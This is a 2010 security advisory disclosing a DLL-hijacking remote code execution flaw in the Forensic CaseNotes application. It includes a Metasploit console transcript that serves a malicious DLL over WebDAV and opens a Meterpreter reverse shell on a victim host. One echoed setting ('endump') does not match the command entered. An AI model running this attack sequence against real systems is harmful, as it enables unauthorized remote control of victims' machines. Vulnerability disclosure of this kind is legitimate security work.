no one is safe ...

Advisory: Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)

---------------------------------------------
Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------

- Forensic CaseNotes Description

The purpose of CaseNotes is to provide a single lightweight application program to run on the Microsoft Windows platform to allow forensic analysts and examiners of any discipline to securely record their contemporaneous notes electronically.

- Insecure Library Loading Allows Remote Code Execution

This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS notes"

For more vulnerability details please check the links in the reference section.

- Affected Versions

1.0.2007.8/1.3.2010.6 - other releases may also be affected.

- Solution

It is not known if there are fixed releases available.

- Credits

The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at

- Timeline

29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure

- Reference

http://www.qccis.com/forensic-tools
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories

- Exploiting example:

msf exploit(webdav_dll_hijacker) > set EXTENSIONS notes
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  notes            yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.

<snip>

[*] 10.8.28.55:49194 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49194 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49194 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49194 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/credssp.dll
[*] 10.8.28.55:49194 PROPFIND => 207 File (/documents/credssp.dll)
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49194 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 2 opened (10.8.28.9:4444 -> 10.8.28.55:49200) at Sun Aug 29 20:43:39 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: m1k3-Vista\m1k3